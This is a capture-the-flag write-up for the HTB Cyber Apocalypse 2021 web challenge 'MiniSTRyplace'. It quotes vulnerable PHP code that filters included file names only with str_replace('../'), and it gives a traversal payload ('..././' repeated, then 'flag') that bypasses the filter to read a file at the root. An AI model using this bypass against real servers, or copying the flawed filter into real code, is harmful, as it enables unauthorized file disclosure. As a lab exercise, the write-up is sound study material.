HTB Cyber Apocalypse CTF 2021: MiniSTRyplace

MiniSTRyplace is a web-based challenge with a difficulty of one star,

Let’s start by reading the source code from the folder provided,

Wait! what??! flag file? well, it's fake,

CHTB{f4k3_fl4g_f0r_t3st1ng}

In the challenge directory, I found the ‘index.php’ file,

<html>
<header>
<meta name='author' content='bertolis, makelaris'>
<title>Ministry of Defence</title>
<link rel="stylesheet" href="/static/css/main.css">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootswatch/4.5.0/slate/bootstrap.min.css"   >
</header>
<body>
<div class="language">
<a href="?lang=en.php">EN</a>
<a href="?lang=qw.php">QW</a>
</div>
<?php
$lang = ['en.php', 'qw.php'];
include('pages/' . (isset($_GET['lang']) ? str_replace('../', '', $_GET['lang']) : $lang[array_rand($lang)]));
?>
</body>
</html>

As you could see this is a Local File Injection challenge, We have to trick the program to include the flag file to read it.

But the input is getting sanitized, we cannot use “../” to go up a directory the program removes it, We can bypass the sanitization,

Input: …/./
Output: ../

Now we can easily bypass the sanitization and go up a directory,

In the Docker file, it is specified that the flag file is in the root directory,

Let’s GET the flag:

?lang=…/./…/./…/./…/./flag

Спасибо :) — Mudhalai Mr Team 1nf1n1ty